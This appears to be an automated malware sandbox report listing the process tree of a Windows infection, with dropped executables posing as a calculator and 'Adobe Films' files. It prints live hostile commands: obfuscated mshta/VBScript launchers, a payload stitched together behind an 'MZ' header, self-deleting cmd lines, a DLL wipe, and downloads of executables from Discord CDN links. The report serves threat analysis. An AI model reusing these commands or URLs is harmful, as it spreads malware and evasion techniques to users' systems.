C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2572 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=1640 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3240 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=3732 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=1956 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2364 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2468 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\daAvGFmInLP9llVHowvdT1JG.exe"C:\Users\Admin\Pictures\Adobe Films\daAvGFmInLP9llVHowvdT1JG.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe"C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im NM7CXeS45IfHCxjP7ALOrXWA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\NM7CXeS45IfHCxjP7ALOrXWA.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NM7CXeS45IfHCxjP7ALOrXWA.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\qCbGN2Tg1ZNb43oxn6V5pPXu.exe"C:\Users\Admin\Pictures\Adobe Films\qCbGN2Tg1ZNb43oxn6V5pPXu.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jv3ip_oP7Js5FEg88aQhg9IS.exe"C:\Users\Admin\Pictures\Adobe Films\jv3ip_oP7Js5FEg88aQhg9IS.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\lng6k_fhu4_efH3KoMaBWcns.exe"C:\Users\Admin\Pictures\Adobe Films\lng6k_fhu4_efH3KoMaBWcns.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Elt_1hjZ7Cc_SE7oikY5wVyf.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Elt_1hjZ7Cc_SE7oikY5wVyf.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"11⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\pyh7zIKR9UZEXCtS7wlOT1BT.exe"C:\Users\Admin\Pictures\Adobe Films\pyh7zIKR9UZEXCtS7wlOT1BT.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2886257.exe"C:\Users\Admin\AppData\Roaming\2886257.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6475169.exe"C:\Users\Admin\AppData\Roaming\6475169.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3603410.exe"C:\Users\Admin\AppData\Roaming\3603410.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\104049.exe"C:\Users\Admin\AppData\Roaming\104049.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5339904.exe"C:\Users\Admin\AppData\Roaming\5339904.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\8535876.exe"C:\Users\Admin\AppData\Roaming\8535876.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\6s2iqIIuSomyLF6cFihESuip.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "6s2iqIIuSomyLF6cFihESuip.exe" -F9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\ZNjEhM7gVrAAxuwEiyqOJ34t.exe"C:\Users\Admin\Pictures\Adobe Films\ZNjEhM7gVrAAxuwEiyqOJ34t.exe"6⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee09⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e9010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1764,4329137705519038288,10573143780041811623,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw132_140769999" --mojo-platform-channel-handle=1776 /prefetch:89⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 584 -ip 5841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 852 -ip 8521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1416 -ip 14161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\31AD.bat "C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe""1⤵
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899625782291361795/899625800544964668/18.exe" "18.exe" "" "" "" "" "" ""2⤵
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899625782291361795/899625964001193984/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""2⤵
-
C:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\31AB.tmp\31AC.tmp\extd.exe "" "" "" "" "" "" "" "" ""2⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\21799\Transmissibility.exeTransmissibility.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\21799\18.exe18.exe2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4516 -ip 45161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 5232 -ip 52321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1248 -ip 12481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2672 -ip 26721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3056 -ip 30561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1452 -ip 14521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3700 -ip 37001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5856 -ip 58561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5492 -ip 54921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5688 -ip 56881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5204 -ip 52041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2964 -ip 29641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-RVMGH.tmp\pXqJ9z4kMcKRrHcFa0zq6bMh.tmp"C:\Users\Admin\AppData\Local\Temp\is-RVMGH.tmp\pXqJ9z4kMcKRrHcFa0zq6bMh.tmp" /SL5="$3031E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\pXqJ9z4kMcKRrHcFa0zq6bMh.exe"1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-CE4L7.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-CE4L7.tmp\ShareFolder.exe" /S /UID=27092⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\47-1a9db-5d6-79db1-6904501d70c61\SHexalyshilo.exe"C:\Users\Admin\AppData\Local\Temp\47-1a9db-5d6-79db1-6904501d70c61\SHexalyshilo.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exeC:\Users\Admin\AppData\Local\Temp\3vk1ii5t.cn0\Calculator.exe5⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d0,0x1d4,0x1d8,0x1ac,0x1dc,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e909⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,13431303747690812435,3682714545647626427,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5572_2125029425" --mojo-platform-channel-handle=1956 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1608,13431303747690812435,3682714545647626427,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5572_2125029425" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:28⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\empxo2ql.r3t\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 2766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe /qn CAMPAIGN="654" & exit4⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exeC:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe /qn CAMPAIGN="654"5⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fi5gjcey.cvg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634304480 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exeC:\Users\Admin\AppData\Local\Temp\xtaxcijq.pi5\any.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahs0x1ga.rs1\customer51.exe & exit4⤵
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
-
